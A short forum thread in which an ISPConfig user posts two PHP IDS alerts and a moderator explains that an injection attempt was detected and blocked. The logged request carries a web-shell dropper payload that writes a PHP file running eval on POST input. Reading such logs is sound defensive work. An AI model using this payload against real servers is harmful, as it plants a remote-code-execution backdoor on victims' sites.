ISPConfig Log

Discussion in 'General' started by dampel, Apr 7, 2020.

  1. dampel

    dampel New Member

    Hi,
    i'm found this errors in the ispconfig log
    [INTERFACE]: PHP IDS Alert.Total impact: 35<br/> Affected tags: sqli, id, lfi, xss, csrf, rfe<br/> <br/> Variable: GET.prefix | Value: ''<br/> Impact: 6 | Tags: sqli, id, lfi<br/> Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID 42<br/> <br/> Variable: GET.content | Value: &lt;php&gt;file_put_contents('spread.php','&lt;?php @eval($_POST[spread]);?&gt;')<br/> Impact: 29 | Tags: xss, csrf, sqli, id, lfi, rfe<br/> Description: Finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID 1<br/> Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID 8<br/> Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID 43<br/> Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID 58<br/> Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID 59<br/> <br/>
    [INTERFACE]: PHP IDS Alert.Total impact: 35<br/> Affected tags: sqli, id, lfi, xss, csrf, rfe<br/> <br/> Variable: GET.prefix | Value: ''<br/> Impact: 6 | Tags: sqli, id, lfi<br/> Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID 42<br/> <br/> Variable: GET.content | Value: &lt;php&gt;file_put_contents('spread.php','&lt;?php @eval($_POST[spread]);?&gt;')<br/> Impact: 29 | Tags: xss, csrf, sqli, id, lfi, rfe<br/> Description: Finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID 1<br/> Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID 8<br/> Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID 43<br/> Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID 58<br/> Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID 59<br/> <br/>

    What does it mean ?
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Someone probably tried to do an SQL and JS injection on your server and this has been detected and prevented.
     
    AfrodCZ likes this.
  3. dampel

    dampel New Member

    Thank you.
     

Share This Page